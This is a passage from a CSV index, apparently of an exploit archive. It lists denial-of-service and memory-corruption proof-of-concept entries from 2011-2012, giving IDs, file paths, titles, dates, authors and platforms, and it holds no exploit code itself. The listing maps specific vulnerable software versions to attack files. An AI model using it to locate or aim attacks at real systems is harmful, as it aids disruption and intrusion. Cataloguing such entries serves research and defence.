Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences",2011-05-12,"Stefan LE BERRE",dos,windows, +17274,exploits/windows/dos/17274.txt,"SlimPDF Reader - Denial of Service (PoC)",2011-05-12,"Nicolas Krassas",dos,windows, +17287,exploits/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' Component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",dos,windows, +17291,exploits/windows/dos/17291.py,"Steam Software - Denial of Service",2011-05-16,david.r.klein,dos,windows, +17298,exploits/netware/dos/17298.txt,"Novell Netware eDirectory - Denial of Service",2011-05-16,nSense,dos,netware, +17305,exploits/windows/dos/17305.py,"Microsoft Windows Vista/2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",dos,windows, +17351,exploits/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,dos,hardware, +17353,exploits/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,dos,hardware, +18716,exploits/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,dos,windows, +17363,exploits/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",dos,windows, +17372,exploits/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Playlist Local File Integer Overflow",2011-06-08,TecR0c,dos,windows, +17455,exploits/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",dos,windows, +17387,exploits/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,dos,windows, +17396,exploits/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,dos,windows, +17398,exploits/windows/dos/17398.txt,"Microsoft Windows Media Player with K-Lite Codec Pack - Denial of Service (PoC)",2011-06-14,"Nicolas Krassas",dos,windows, +17399,exploits/windows/dos/17399.txt,"Microsoft Office XP - Remote code Execution",2011-06-14,"Francis Provencher",dos,windows, +17400,exploits/linux/dos/17400.c,"Conky Linux 1.8.0 - Local Denial of Service (PoC)",2011-06-14,"Arturo D'Elia",dos,linux, +17401,exploits/windows/dos/17401.txt,"Microsoft HyperV - Persistent Denial of Service (MS11-047)",2011-06-14,"Core Security",dos,windows, +17405,exploits/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 - Denial of Service",2011-06-16,"Soroush Dalili",dos,windows, +17421,exploits/windows/dos/17421.py,"XnView 1.98 - Denial of Service (PoC)",2011-06-20,BraniX,dos,windows, +17458,exploits/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",dos,windows, +17461,exploits/windows/dos/17461.txt,"HP Data Protector 6.20 - EXEC_CMD Buffer Overflow",2011-06-30,"Core Security",dos,windows, +17463,exploits/linux/dos/17463.pl,"Rhythmbox - '.m3u' Local Crash (PoC)",2011-06-30,Caddy-Dz,dos,linux, +17471,exploits/windows/dos/17471.py,"Donar Player 2.8.0 - Denial of Service",2011-07-03,X-h4ck,dos,windows, +17476,exploits/windows/dos/17476.rb,"Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit)",2011-07-03,"Myo Soe",dos,windows, +17509,exploits/windows/dos/17509.pl,"ZipWiz 2005 5.0 - '.zip' Buffer Corruption",2011-07-08,"C4SS!0 G0M3S",dos,windows, +17497,exploits/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 - ASX Playlist File Handling Buffer Overflow",2011-07-06,LiquidWorm,dos,windows, +17501,exploits/hardware/dos/17501.py,"D-Link DSL-2650U - Denial of Service (PoC)",2011-07-07,"Li'el Fridman",dos,hardware, +17512,exploits/windows/dos/17512.pl,"ZipItFast 3.0 - '.zip' Heap Overflow",2011-07-08,"C4SS!0 G0M3S",dos,windows, +17544,exploits/windows/dos/17544.txt,"GDI+ - 'gdiplus.dll' CreateDashedPath Integer Overflow",2011-07-18,Abysssec,dos,windows, +17549,exploits/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,anonymous,dos,multiple, +17567,exploits/osx/dos/17567.txt,"Apple Safari 5.0.6/5.1 - SVG DOM Processing (PoC)",2011-07-25,"Nikita Tarakanov",dos,osx, +17569,exploits/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name Denial of Service",2011-07-25,"Craig Freyman",dos,windows, +17580,exploits/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,dos,windows, +17582,exploits/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Based Buffer Overflow",2011-07-28,"n.runs AG",dos,windows, +17583,exploits/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service - Heap Corruption",2011-07-28,"n.runs AG",dos,windows, +17601,exploits/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - Denial of Service",2011-08-03,"Craig Freyman",dos,windows, +17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",dos,multiple, +17618,exploits/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server 'Write Command' Denial of Service",2011-08-05,"SecPod Research",dos,windows, +17620,exploits/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",dos,windows, +17638,exploits/windows/dos/17638.py,"LiteServe 2.81 - PASV Command Denial of Service",2011-08-08,"Craig Freyman",dos,windows, +17642,exploits/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,dos,windows, +17643,exploits/windows/dos/17643.pl,"Excel - SLYK Format Parsing Buffer Overrun (PoC)",2011-08-09,webDEViL,dos,windows, +17658,exploits/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive",2011-08-12,G13,dos,windows, +17664,exploits/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,dos,windows, +17676,exploits/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC)",2011-08-17,0in,dos,windows, +17696,exploits/multiple/dos/17696.pl,"Apache - Remote Memory Exhaustion (Denial of Service)",2011-08-19,kingcope,dos,multiple, +17712,exploits/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",dos,windows, +17718,exploits/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",dos,windows, +17742,exploits/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,dos,windows, +42604,exploits/multiple/dos/42604.html,"IBM Notes 8.5.x/9.0.x - Denial of Service (2)",2017-08-31,"Dhiraj Mishra",dos,multiple, +17769,exploits/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",dos,linux, +17772,exploits/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",dos,windows, +17781,exploits/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",dos,windows, +17785,exploits/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service 'TOWeb.MO' File Corruption",2011-09-05,"BSOD Digital",dos,windows, +17795,exploits/windows/dos/17795.py,"Crush FTP 5 - 'APPE' Remote JVM Blue Screen of Death (PoC)",2011-09-07,"BSOD Digital",dos,windows, +17796,exploits/windows/dos/17796.txt,"Microsoft Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,dos,windows, +21788,exploits/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",dos,windows, +17806,exploits/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash (PoC)",2011-09-08,localh0t,dos,linux, +17815,exploits/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service (PoC)",2011-09-09,modpr0be,dos,windows, +21785,exploits/windows/dos/21785.pl,"HCView - WriteAV Crash (PoC)",2012-10-07,"Jean Pascal Pereira",dos,windows, +17830,exploits/windows/dos/17830.txt,"Microsoft WINS Service 5.2.3790.4520 - Memory Corruption (MS11-035)",2011-09-13,"Luigi Auriemma",dos,windows, +17831,exploits/windows/dos/17831.txt,"Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070)",2011-09-13,"Core Security",dos,windows, +17835,exploits/windows/dos/17835.txt,"Beckhoff TwinCAT 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",dos,windows, +17836,exploits/windows/dos/17836.txt,"Equis MetaStock 11 - Use-After-Free",2011-09-14,"Luigi Auriemma",dos,windows, +17837,exploits/windows/dos/17837.txt,"eSignal and eSignal Pro 10.6.2425.1208 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",dos,windows, +17838,exploits/windows/dos/17838.txt,"Cogent DataHub 7.1.1.63 - Stack Overflow",2011-09-14,"Luigi Auriemma",dos,windows, +17839,exploits/windows/dos/17839.txt,"Cogent DataHub 7.1.1.63 - Integer Overflow",2011-09-14,"Luigi Auriemma",dos,windows, +17841,exploits/windows/dos/17841.txt,"DaqFactory 5.85 build 1853 - Stack Overflow",2011-09-14,"Luigi Auriemma",dos,windows, +17842,exploits/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",dos,windows, +17843,exploits/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",dos,windows, +17844,exploits/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",dos,windows, +17856,exploits/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (PoC)",2011-09-18,loneferret,dos,windows,21 +17878,exploits/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",dos,windows, +17879,exploits/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",dos,windows, +17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",dos,windows, +17889,exploits/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",dos,windows, +17890,exploits/windows/dos/17890.c,"GMER 1.0.15.15641 - MFT Overwrite",2011-09-26,Heurs,dos,windows, +17896,exploits/windows/dos/17896.txt,"PcVue 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",dos,windows, +17901,exploits/osx/dos/17901.c,"Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service)",2011-09-28,hkpco,dos,osx, +17903,exploits/windows/dos/17903.txt,"NCSS 07.1.21 - Array Overflow with Write2",2011-09-29,"Luigi Auriemma",dos,windows, +17908,exploits/freebsd/dos/17908.sh,"FreeBSD - UIPC socket heap Overflow (PoC)",2011-09-30,"Shaun Colley",dos,freebsd, +17918,exploits/windows/dos/17918.txt,"Adobe Photoshop Elements 8.0 - Multiple Arbitrary Code Execution Vulnerabilities",2011-10-02,LiquidWorm,dos,windows, +17928,exploits/windows/dos/17928.pl,"Ashampoo Burning Studio Elements 10.0.9 - '.ashprj' Heap Overflow",2011-10-04,LiquidWorm,dos,windows, +17929,exploits/windows/dos/17929.txt,"Google Chrome < 14.0.835.163 - '.pdf' File Handling Memory Corruption",2011-10-04,"Mario Gomes",dos,windows, +17930,exploits/windows/dos/17930.txt,"Cytel Studio 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",dos,windows, +17931,exploits/windows/dos/17931.txt,"GenStat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",dos,windows, +17933,exploits/windows/dos/17933.html,"DivX Plus Web Player - 'file://' Buffer Overflow (PoC)",2011-10-05,Snake,dos,windows, +17963,exploits/windows/dos/17963.txt,"atvise webMI2ADS Web Server 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",dos,windows, +17964,exploits/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",dos,windows, +17965,exploits/windows/dos/17965.txt,"OPC Systems.NET 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",dos,windows, +17978,exploits/windows/dos/17978.txt,"Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)",2011-10-13,"Byoungyoung Lee",dos,windows, +17981,exploits/windows/dos/17981.py,"Microsoft Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",dos,windows, +17982,exploits/windows/dos/17982.pl,"BlueZone Desktop - '.zap' file Local Denial of Service",2011-10-15,Silent_Dream,dos,windows, +18006,exploits/windows/dos/18006.html,"Opera 11.52 - Denial of Service (PoC)",2011-10-20,pigtail23,dos,windows, +18007,exploits/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflows",2011-10-20,rgod,dos,windows, +18008,exploits/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,dos,windows, +18011,exploits/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,dos,windows, +18014,exploits/windows/dos/18014.html,"Opera 11.51 - Use-After-Free Crash (PoC)",2011-10-21,"Roberto Suggi Liverani",dos,windows, +18017,exploits/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - 'CEPMServer.exe' Denial of Service (PoC)",2011-10-21,loneferret,dos,windows, +18019,exploits/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,dos,windows, +18023,exploits/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,dos,php, +18024,exploits/windows/dos/18024.txt,"Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)",2011-10-23,KiDebug,dos,windows, +18025,exploits/multiple/dos/18025.txt,"Google Chrome - Denial of Service",2011-10-23,"Prashant Uniyal",dos,multiple, +18043,exploits/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,dos,windows, +40298,exploits/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",dos,windows,80 +18028,exploits/windows/dos/18028.py,"zFTPServer - 'cwd/stat' Remote Denial of Service",2011-10-24,"Myo Soe",dos,windows, +18029,exploits/windows/dos/18029.pl,"BlueZone - '.zft' File Local Denial of Service",2011-10-24,"Iolo Morganwg",dos,windows, +18030,exploits/windows/dos/18030.pl,"BlueZone Desktop - Multiple Malformed Files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,dos,windows, +18049,exploits/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",dos,windows, +18052,exploits/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,dos,windows, +18078,exploits/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 - Use-After-Free",2011-11-04,"Luigi Auriemma",dos,windows, +18106,exploits/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,dos,windows, +18107,exploits/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,dos,windows, +18119,exploits/windows/dos/18119.rb,"Attachmate Reflection FTP Client - Heap Overflow",2011-11-16,"Francis Provencher",dos,windows, +18120,exploits/linux/dos/18120.py,"FleaHttpd - Remote Denial of Service",2011-11-16,condis,dos,linux,80 +18112,exploits/windows/dos/18112.txt,"optima apiftp server 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",dos,windows, +18116,exploits/multiple/dos/18116.html,"Mozilla Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,dos,multiple, +18124,exploits/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow / Denial of Service",2011-11-18,hellok,dos,windows, +18140,exploits/windows/dos/18140.c,"Microsoft Winows 7 - Keyboard Layout Blue Screen of Death (MS10-073)",2011-11-21,instruder,dos,windows, +18159,exploits/linux/dos/18159.py,"XChat 2.8.9 - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",dos,linux, +18165,exploits/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",dos,windows, +18166,exploits/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",dos,windows, +18173,exploits/windows/dos/18173.pl,"Bugbear FlatOut 2005 - '.bed' File Buffer Overflow",2011-11-30,Silent_Dream,dos,windows, +18188,exploits/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",dos,windows, +18200,exploits/windows/dos/18200.txt,"SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)",2011-12-05,LiquidWorm,dos,windows, +18196,exploits/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)",2011-12-03,Zune,dos,windows, +18199,exploits/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 - Remote reboot/shutdown/reset (Denial of Service)",2011-12-05,rigan,dos,hardware, +18220,exploits/windows/dos/18220.py,"CyberLink (Multiple Products) - File Project Handling Stack Buffer Overflow (PoC)",2011-12-09,modpr0be,dos,windows, +18221,exploits/linux/dos/18221.c,"Apache - Denial of Service",2011-12-09,"Ramon de C Valle",dos,linux, +18223,exploits/windows/dos/18223.pl,"Free Opener - Local Denial of Service",2011-12-09,"Iolo Morganwg",dos,windows, +18225,exploits/linux/dos/18225.c,"CSF Firewall - Buffer Overflow",2011-12-09,"FoX HaCkEr",dos,linux, +18257,exploits/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",dos,windows, +18254,exploits/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,dos,windows, +18256,exploits/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",dos,windows, +18268,exploits/windows/dos/18268.txt,"freeSSHd - Denial of Service (PoC)",2011-12-24,Level,dos,windows, +18269,exploits/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,dos,windows, +18270,exploits/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,dos,windows, +18271,exploits/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,dos,windows, +18272,exploits/windows/dos/18272.py,"Microsoft Windows Explorer - Denial of Service",2011-12-24,Level,dos,windows, +18275,exploits/win_x86-64/dos/18275.txt,"Apple Safari - GdiDrawStream Blue Screen of Death",2011-12-18,webDEViL,dos,win_x86-64, +18278,exploits/linux/dos/18278.txt,"Nagios Plugins check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",dos,linux, +18285,exploits/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - libav 'libavcodec_plugin.dll' Denial of Service",2011-12-28,"Mitchell Adair",dos,windows, +18295,exploits/linux/dos/18295.txt,"lighttpd - Denial of Service (PoC)",2011-12-31,pi3,dos,linux, +18296,exploits/php/dos/18296.txt,"PHP 5.3.8 - Hashtables Denial of Service",2012-01-01,infodox,dos,php, +19024,exploits/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta - Remote Format String Overflow",2012-06-08,demonalex,dos,windows, +18305,exploits/php/dos/18305.py,"PHP Hash Table Collision - Denial of Service (PoC)",2012-01-03,"Christian Mehlmauer",dos,php, +18309,exploits/windows/dos/18309.pl,"VideoLAN VLC Media Player 1.1.11 - '.amr' Denial of Service (PoC)",2012-01-04,Fabi@habsec,dos,windows, +18318,exploits/windows/dos/18318.py,"Netcut 2.0 - Denial of Service",2012-01-04,MaYaSeVeN,dos,windows, +18977,exploits/php/dos/18977.php,"PHP 5.3.10 - 'spl_autoload_register()' Local Denial of Service",2012-06-03,"Yakir Wizman",dos,php, +18978,exploits/php/dos/18978.php,"PHP 5.3.10 - 'spl_autoload_call()' Local Denial of Service",2012-06-03,"Yakir Wizman",dos,php, +18327,exploits/netware/dos/18327.txt,"Novell Netware - XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",dos,netware, +18328,exploits/netware/dos/18328.txt,"Novell Netware - XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",dos,netware, +18336,exploits/hardware/dos/18336.pl,"AirTies-4450 - Unauthorized Remote Reboot (Denial of Service)",2012-01-08,rigan,dos,hardware, +18337,exploits/windows/dos/18337.pl,"M-Player 0.4 - Local Denial of Service",2012-01-08,JaMbA,dos,windows, +18339,exploits/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 - '.lst' Local Denial of Service",2012-01-09,"Julien Ahrens",dos,windows, +18351,exploits/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",dos,netware, +18370,exploits/multiple/dos/18370.txt,"PHP 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",dos,multiple, +18378,exploits/linux/dos/18378.c,"Linux 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,dos,linux, +18976,exploits/php/dos/18976.php,"PHP 5.3.10 - 'spl_autoload()' Local Denial of Service",2012-06-03,"Yakir Wizman",dos,php, +18399,exploits/windows/dos/18399.py,"VideoLAN VLC Media Player 1.2.0 - 'libtaglib_pluggin.dll' Denial of Service",2012-01-20,"Mitchell Adair",dos,windows, +18698,exploits/windows/dos/18698.py,"Xion Audio Player 1.0.127 - '.aiff' Denial of Service",2012-04-04,condis,dos,windows, +18427,exploits/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,dos,windows, +18436,exploits/linux/dos/18436.txt,"sudo 1.8.0 < 1.8.3p1 - Format String",2012-01-31,joernchen,dos,linux, +18440,exploits/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 - 'officeviewermme.ocx' Buffer Overflow (PoC)",2012-01-31,LiquidWorm,dos,windows, +18453,exploits/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service",2012-02-02,"SecPod Research",dos,windows, +18454,exploits/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",dos,windows, +18457,exploits/linux/dos/18457.py,"torrent-stats - 'httpd.c' Denial of Service",2012-02-03,otr,dos,linux, +18458,exploits/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,dos,php, +18460,exploits/php/dos/18460.php,"PHP 5.4.0RC6 (x64) - Denial of Service",2012-02-04,"Stefan Esser",dos,php, +18461,exploits/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",dos,windows, +18463,exploits/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",dos,windows, +18469,exploits/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service Vulnerabilities",2012-02-07,"Balazs Makany",dos,windows, +18475,exploits/windows/dos/18475.c,"PeerBlock 1.1 - Blue Screen of Death",2012-02-09,shinnai,dos,windows, +18481,exploits/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",dos,windows, +18488,exploits/windows/dos/18488.txt,"Novell Groupwise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",dos,windows,8300 +18489,exploits/windows/dos/18489.txt,"Novell Groupwise Messenger 2.1.0 - Memory Corruption",2012-02-16,"Luigi Auriemma",dos,windows,8300 +18490,exploits/windows/dos/18490.txt,"Novell Groupwise Messenger Client 2.1.0 - Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",dos,windows, +18491,exploits/windows/dos/18491.txt,"xnview 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",dos,windows, +18493,exploits/windows/dos/18493.py,"pcAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",dos,windows, +18507,exploits/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow (PoC)",2012-02-22,"Julien Ahrens",dos,windows, +18512,exploits/windows/dos/18512.txt,"Unity 3D Web Player 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",dos,windows, +18524,exploits/windows/dos/18524.py,"Tiny HTTP Server 1.1.9 - Remote Crash (PoC)",2012-02-25,localh0t,dos,windows, +18541,exploits/windows/dos/18541.py,"Netmechanica NetDecision HTTP Server - Denial of Service",2012-02-29,"SecPod Research",dos,windows, +18546,exploits/windows/dos/18546.txt,"Novell Groupwise - Address Book Remote Code Execution",2012-03-01,"Francis Provencher",dos,windows, +18552,exploits/windows/dos/18552.pl,"Passport PC To Host - '.zws' File Memory Corruption",2012-03-03,Silent_Dream,dos,windows, +18600,exploits/multiple/dos/18600.txt,"presto! pagemanager 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",dos,multiple, +18601,exploits/multiple/dos/18601.txt,"EMC NetWorker 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",dos,multiple, +18579,exploits/linux/dos/18579.txt,"PyPAM Python bindings for PAM - Double-Free Corruption",2012-03-10,"Markus Vervier",dos,linux, +18584,exploits/windows/dos/18584.txt,"GOM Media Player 2.1.37 - Buffer Overflow",2012-03-12,longrifle0x,dos,windows, +18586,exploits/windows/dos/18586.txt,"XnView FlashPix Image Processing - Heap Overflow",2012-03-12,"Francis Provencher",dos,windows, +18587,exploits/windows/dos/18587.py,"Network Instrument Observer - SNMP SetRequest Denial of Service",2012-03-12,"Francis Provencher",dos,windows, +18602,exploits/windows/dos/18602.txt,"Epson EventManager 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",dos,windows, +18606,exploits/windows/dos/18606.txt,"Microsoft Terminal Services - Use-After-Free (MS12-020)",2012-03-16,"Luigi Auriemma",dos,windows, +18705,exploits/hardware/dos/18705.txt,"Sony Bravia - Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",dos,hardware, +18628,exploits/windows/dos/18628.py,"PeerFTP Server 4.01 - Remote Crash (PoC)",2012-03-20,localh0t,dos,windows, +18629,exploits/windows/dos/18629.py,"Tiny Server 1.1.9 - HEAD Denial of Service",2012-03-20,"brock haun",dos,windows, +18630,exploits/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote Denial of Service",2012-03-20,G13,dos,android, +18633,exploits/windows/dos/18633.txt,"Adobe Photoshop 12.1 - '.tiff' Parsing Use-After-Free",2012-03-20,"Francis Provencher",dos,windows, +18636,exploits/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - '.TMD' File Handling Buffer Overflow",2012-03-21,LiquidWorm,dos,windows, +18637,exploits/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Memory Corruption",2012-03-21,LiquidWorm,dos,windows, +18641,exploits/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,dos,windows, +18643,exploits/windows/dos/18643.py,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",dos,windows, +18654,exploits/windows/dos/18654.txt,"Spotify 0.8.2.610 - search func Memory Exhaustion",2012-03-23,LiquidWorm,dos,windows, +18661,exploits/windows/dos/18661.txt,"RealPlayer - '.mp4' file handling memory Corruption",2012-03-24,"Senator of Pirates",dos,windows, +18665,exploits/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - Denial of Service (PoC)",2012-03-25,ls,dos,multiple, +18671,exploits/windows/dos/18671.pl,"KnFTPd 1.0.0 - 'FEAT' Denial of Service (PoC)",2012-03-28,"Stefan Schurtz",dos,windows, +18717,exploits/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflows",2012-04-08,Vulnerability-Lab,dos,windows, +18688,exploits/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",dos,hardware, +18691,exploits/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",dos,windows, 